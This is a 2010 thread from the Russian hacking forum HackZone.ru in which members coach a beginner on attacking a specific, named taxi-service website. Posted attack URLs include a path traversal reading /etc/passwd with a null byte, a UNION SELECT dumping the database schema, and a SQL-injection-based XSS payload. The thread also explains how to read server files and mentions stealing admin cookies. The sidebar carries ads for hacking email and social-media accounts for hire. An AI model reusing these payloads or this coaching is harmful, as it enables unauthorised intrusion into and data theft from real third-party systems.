Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Xss что даёт? Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] [3] Просмотров - 8704
Xss что даёт?
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
D-512



Moderator
Gold Member
# | Сообщение добавлено 12.04.2010 23:31:15
На одном сайте в строку "id=" ввёл [script]alert(/xss/)[/script] и мне выдало ошибку:
 
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /storage/home/srv19838/htdocs/index.php on line 149
Warning: include(file/1' sd.php) [function.include]: failed to open stream: No such file or directory in /storage/home/srv19838/htdocs/index.php on line 182
 
Warning: include(file/1' sd.php) [function.include]: failed to open stream: No such file or directory in /storage/home/srv19838/htdocs/index.php on line 182
 
Warning: include() [function.include]: Failed opening 'file/1' sd.php' for inclusion (include_path='.:/usr/local/share/pear') in /storage/home/srv19838/htdocs/index.php on line 182
 
Что это мне может дать и как действовать дальше! Подскажить плиз ! С Уважением Саня Rocks
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 12.04.2010 23:35:50
Во первых, скрипты вводятся в таких скобках <script>, а не в [script], во вторых это не XSS, уж больно похоже на Full Path Disclosure с возможным SQL-Injection
 
Сказать спасибо Ответить Цитировать

Bb0y



Moderator
Elite
# | Сообщение добавлено 12.04.2010 23:36:14
1. Скобки <>
2. Это инклюд, хсс не вижу в упор, как и ты
3. Читай статьи
4. Что дает хсс?... Радость людям
 

Добавлено 12.04.2010 23:37:51 (через 2 минуты 37 секунд )
 
Дем как всегда первыи
 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 12.04.2010 23:48:02
Отредактировано 13.04.2010 00:00:29 by M.W.N.N.
Инклуд
Text

http://www.voronezh-taxi.ru/?id=../../../../../etc/passwd%00
 

Sql inj
Text

http://www.voronezh-taxi.ru/?action=street&step=full&id=10&id1=66+union+select+1,2,3,4,concat_ws%280x3a,table_schema,
table_name,column_name%29+from+information_schema.columns--+
 

SIXSS
Text

http://www.voronezh-taxi.ru/?action=street&step=full&id=10&id1=66+union+select+1,2,concat_ws%280x3a,CHAR%2860,115,99,
114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,47,
41,60,47,115,99,114,105,112,116,62%29%29,4,5--+
 

 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

D-512



Moderator
Gold Member
# | Сообщение добавлено 13.04.2010 00:04:54
Спасибо всем!!!
 
Добавлено 13.04.2010 00:06:46 (через 2 минуты 52 секунды )
 
А можно это какнибуть использовать?
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 13.04.2010 00:11:03
вроде и так должно быть все понятно.
Можешь стащить кукисы админов, но админки я не вижу, да и скуля есть. Можешь почитать файлы на сервере, что еще надо то? 0_о
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

D-512



Moderator
Gold Member
# | Сообщение добавлено 13.04.2010 00:15:14
M.W.N.N. а как прочиать файлы Cry
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 13.04.2010 00:18:24
Нужно знать полный путь до файла и делай по примеру
Text

http://www.voronezh-taxi.ru/?id=../../../../../etc/passwd%00
 
Значит что в дириктории /etc/ лежит фаил passwd %00 нулл байт для того что бы срезать расширение которое к нему лепит скрипт - .php
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 13.04.2010 00:22:09
M.W.N.N.

Нужно знать полный путь до файла
Как я уже написал выше, там и так Full Path Disclosure
 
Сказать спасибо Ответить Цитировать

D-512



Moderator
Gold Member
# | Сообщение добавлено 13.04.2010 00:28:48
Отредактировано 13.04.2010 00:29:19 by D-512
M.W.N.N. а как ты узнал что это www.voronezh-taxi.ru ?? Спасибо всем кто подключился к теме Thumbsup !
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2] [3]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Новичкам » Услуги Хакера WhatsApp,Viber,ВКонтакте, nstagram,Facebook, e
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Ищу работу » Re: Взлом емейлов, вконтакте, одноклассники
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Программирование / WEB Design » Уроки по JavaScript для начинающих
  • Разное / Ищу работу » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...
  • Разное / Ищу работу » Re: взлом почты на майле

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}